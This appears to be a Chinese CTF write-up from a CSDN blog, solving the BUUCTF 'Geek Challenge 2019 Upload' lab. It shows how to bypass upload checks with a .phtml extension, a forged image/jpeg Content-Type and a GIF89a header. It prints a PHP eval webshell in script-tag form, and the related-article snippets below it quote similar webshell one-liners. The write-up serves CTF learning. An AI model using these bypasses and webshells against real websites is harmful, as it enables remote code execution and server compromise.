BUUCTF [极客大挑战 2019] Upload

最新推荐文章于 2024-05-05 18:30:47 发布
最新推荐文章于 2024-05-05 18:30:47 发布
阅读量2.4k 收藏 5
点赞数 1
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF 极客大挑战 2019 Upload writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111311908
版权

BUUCTF [极客大挑战 2019] Upload

考点:

  1. 文件后缀绕过
  2. 文件类型Content-Type绕过
  3. 一句话木马<?绕过

启动环境:
在这里插入图片描述
有上传头像的地方,首先上传正常图片测试:
在这里插入图片描述
上传了一张.jpg格式的文件,也显示不是图片
后续测试.php.txt都不行,可能不止限制了文件后缀,使用BurpSuite抓取数据包:
在这里插入图片描述
其中两条属性:

Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
  • 将文件名修改为test.phtml,绕过常规php文件后缀检测
  • 将文件类型修改为:image/jpeg

发送数据包,得到回显:
在这里插入图片描述
查阅资料,可以通过:

GIF89a?
<script language="php">eval($_REQUEST[shell])</script>

该方式绕过<?的检测:参考资料

重新使用BurpSuite抓取数据包并修改为:
在这里插入图片描述
得到上传成功的回显:
在这里插入图片描述
使用蚁剑连接:
在这里插入图片描述
原目录下找不到test.phtml,猜测传入文件的路径,最终测试到:/upload/为文件目录,蚁剑连接:
在这里插入图片描述
/目录找到flag:
在这里插入图片描述

Senimo_
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
2024年最全CTFshow web入门——文件上传_ctfshow文件上传,给大家安排上
最新发布
2401_84520377的博客
05-05 817
上传一个图片木马,发现上传不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上传,bp抓包。
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 836
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
WEB漏洞攻防 - 文件上传漏洞 - CTF - [极客挑战 2019]Upload-1
易编橙 · 终身成长社群,相遇已是上上签!
09-02 490
CTF - [极客挑战 2019]Upload-1
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 4817
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1026
Upload=> 文件上传漏洞。
buuctf web [极客挑战 2019]Upload
m0_61903191的博客
09-20 392
ps(补充):文件绕过的格式php,php3,php4,php5,phtml.pht。根据题目提示,大胆猜测文件位置在/upload/1.phtml。上传成功,下面就要看看,上传的文件被放在了什么位置。改两个地方,符合上传图片的要求,上传试试。但是此时文件格式为.jpg我们利用不了。抓包,抓取上传时的数据,看看限制条件。上传头像上传一下,看看能不能成功。所以,换成没有被过滤的网页格式。phtml没有被过滤,可以使用。先访问一下/upload
BUUCTF--[HarekazeCTF2019]Avatar Uploader 1
qq_46263951的博客
07-19 387
name随便输一个,进入之后看到是让上传头像,这个应该是一个文件上传漏洞 接下来分析所给的源码 <?php error_reporting(0); require_once('config.php'); require_once('lib/util.php'); require_once('lib/session.php'); $session = new SecureClientSession(CLIENT_SESSION_ID, SECRET_KEY); // check wh..
Buuctf极客挑战2019upload
m0_64444909的博客
04-07 5182
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1330
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF WEB CV Maker
qq_41696858的博客
05-11 248
这题其实挺没意思的,没意思到简简单单的一个图片马而已 本来看见注册逻辑,还想想sql注入啥的,发现登陆以后连个回显都没有,也没找到啥判断逻辑的地方,注个锤子 随便注册个账号,登录,发现有上传头像功能,这不传个shell上去玩玩?好吧,这题就是个文件上传题 原生的php上传,提示exif_imagetype not image,不是图片格式,加一个GIF89a直接过,连文件类型过滤都没有的 在原来页面里找到上传地址,蚁剑直接连,成功拿到flag 参考视频链接:https://www.bilibili.com/
[极客挑战 2019]Upload
kuller_Yan的博客
06-14 688
[极客挑战 2019]Upload wp from Kuller_Yan 一道很简单的文件上传漏洞: 打开靶机看到很直观的页面让我们上传。随便上传一个一句话木马,发现 看来type必须是图片,那我们构建一个phtml文件 GIF89a <script language="php">eval($_POST['123']);</script> 在上传的时候抓包,更改类型;image/jpeg 然后盲猜url为/upload 访问http://29f56e21-5b5a-4212-
Buuctf 极客挑战 upload
Dexret的博客
12-07 2530
打开该靶机,为一个上传图片的网站 尝试了一下上传php文件改Content-Type,.htaccess以及ini文件,都不能成功 百度了一下还有一种文件名后缀可以绕过 .phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。 因此,在高效使用中,您应该体验到.phtml与.php文件没有任何区别。 这是一个文件ext,一些人用了一段时间来表示它是PHP生成的HTML。 修改shell.php为shell.phtml,内容为:
BUUCTF 大白 1
YueXuan_521的博客
10-22 705
BUUCTF 大白 1 题解
BUUCTF[极客挑战2019]Upload
weixin_45253622的博客
05-07 173
文件上传过滤和绕过 打开题目,发现了一个可以上传图片的上传点。 我们上传一句话木马试试; 会显示不是图片,我们BP抓包修改类型试试:(由于电脑把我的一句话删掉了,所以这里使用phtml来上传一句话木马) phtml就是嵌入php代码的html文件。 修改类型为:image/jpeg 放包发现: 盲猜后台上传地址为 http://52159d7e-a98b-453c-ab5e-6f3741dd9748.node3.buuoj.cn/upload/ 菜刀连接:http://5215
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值